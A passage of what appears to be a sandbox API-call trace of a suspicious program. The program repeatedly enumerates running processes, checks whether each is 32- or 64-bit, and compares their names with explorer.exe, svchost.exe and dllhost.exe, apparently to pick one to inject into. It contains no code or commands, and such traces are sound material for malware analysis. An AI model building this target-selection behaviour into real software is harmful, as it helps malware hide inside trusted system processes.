Wow64Process=0x2cf764) returned 1 [0232.226] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.226] CloseHandle (hObject=0xec) returned 1 [0232.226] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0232.226] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0232.226] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0232.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0232.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0232.227] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.227] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.227] CloseHandle (hObject=0xec) returned 1 [0232.227] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0232.227] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0232.227] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0232.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0232.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0232.228] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.228] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.228] CloseHandle (hObject=0xec) returned 1 [0232.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0232.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0232.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0232.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0232.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0232.228] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.228] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.228] CloseHandle (hObject=0xec) returned 1 [0232.228] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0232.228] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0232.228] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0232.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0232.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0232.229] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.229] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.229] CloseHandle (hObject=0xec) returned 1 [0232.229] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0232.229] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0232.229] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0232.229] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0232.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0232.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.230] CloseHandle (hObject=0xec) returned 1 [0232.230] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0232.230] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0232.230] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0232.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0232.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0232.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.230] CloseHandle (hObject=0xec) returned 1 [0232.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0232.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0232.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0232.231] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0232.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0232.231] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.231] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.231] CloseHandle (hObject=0xec) returned 1 [0232.231] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0232.231] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0232.231] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0232.231] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0232.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0232.232] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.232] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.232] CloseHandle (hObject=0xec) returned 1 [0232.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0232.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0232.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0232.232] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0232.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0232.232] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.232] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.232] CloseHandle (hObject=0xec) returned 1 [0232.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0232.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0232.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0232.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0232.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0232.233] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.233] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.233] CloseHandle (hObject=0xec) returned 1 [0232.233] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0232.233] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0232.233] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0232.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0232.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0232.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.234] CloseHandle (hObject=0xec) returned 1 [0232.234] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0232.234] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0232.234] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0232.234] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0232.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0232.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.234] CloseHandle (hObject=0xec) returned 1 [0232.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0232.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0232.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0232.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0232.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0232.235] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.235] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.235] CloseHandle (hObject=0xec) returned 1 [0232.235] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0232.235] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0232.235] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0232.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0232.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0232.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0232.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0232.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0232.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0232.238] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.238] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.238] CloseHandle (hObject=0xec) returned 1 [0232.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0232.239] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.239] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.239] CloseHandle (hObject=0xec) returned 1 [0232.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0232.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0232.240] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.240] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.240] CloseHandle (hObject=0xec) returned 1 [0232.240] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0232.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0232.241] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.241] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.241] CloseHandle (hObject=0xec) returned 1 [0232.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0232.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.242] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0232.242] CloseHandle (hObject=0xec) returned 1 [0232.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0232.242] CloseHandle (hObject=0xe8) returned 1 [0232.242] Sleep (dwMilliseconds=0x3e8) [0233.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0233.270] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0233.270] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0233.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0233.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0233.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0233.272] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0233.273] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0233.273] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0233.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0233.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0233.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0233.275] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0233.275] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0233.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0233.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0233.277] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0233.277] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0233.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0233.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 